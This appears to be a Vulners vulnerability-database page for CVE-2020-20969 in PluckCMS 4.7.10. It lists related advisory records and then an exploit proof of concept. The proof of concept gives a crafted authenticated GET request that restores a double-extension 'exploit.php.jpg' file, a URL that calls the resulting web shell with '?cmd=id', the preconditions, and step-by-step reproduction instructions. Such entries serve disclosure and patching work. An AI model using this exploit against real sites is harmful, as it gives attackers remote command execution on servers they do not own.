| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2020-20969 | 4 Dec 202521:02 | – | circl | |
| PluckCMS 代码问题漏洞 | 20 Jun 202300:00 | – | cnnvd | |
| PluckCMS Arbitrary File Upload Vulnerability | 28 Jun 202300:00 | – | cnvd | |
| CVE-2020-20969 | 20 Jun 202300:00 | – | cve | |
| CVE-2020-20969 | 20 Jun 202300:00 | – | cvelist | |
| EUVD-2020-13748 | 7 Oct 202500:30 | – | euvd | |
| CVE-2020-20969 | 20 Jun 202315:15 | – | nvd | |
| CVE-2020-20969 | 20 Jun 202315:15 | – | osv | |
| 📄 PluckCMS 4.7.10 Arbitrary File Upload | 3 Dec 202500:00 | – | packetstorm | |
| 📄 PluckCMS 4.7.10 Shell Upload | 16 Feb 202600:00 | – | packetstorm |
# Exploit Title: PluckCMS 4.7.10 - Unrestricted File Upload
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/pluck-cms/pluck/
# Software Link: https://github.com/pluck-cms/pluck/
# Version: 4.7.10
# Tested on: Windows
# CVE : CVE-2020-20969
Proof Of Concept
GET /admin.php?action=trash_restoreitem&var1=exploit.php.jpg&var2=file HTTP/1.1
Host: pluck
Cookie: PHPSESSID=[valid_session_id]
**Access Method:**
http://pluck/files/exploit_copy.php?cmd=id
**Additional Conditions:**
1. Valid session cookie required (authenticated attack)
2. File `exploit.php.jpg` must exist in `data/trash/files/` before restoration
3. Server must not filter double extensions during file upload/trash operations
Steps to Reproduce
Log in as an admin user.
Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie.
The file will be restored and can be accessed through the url.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation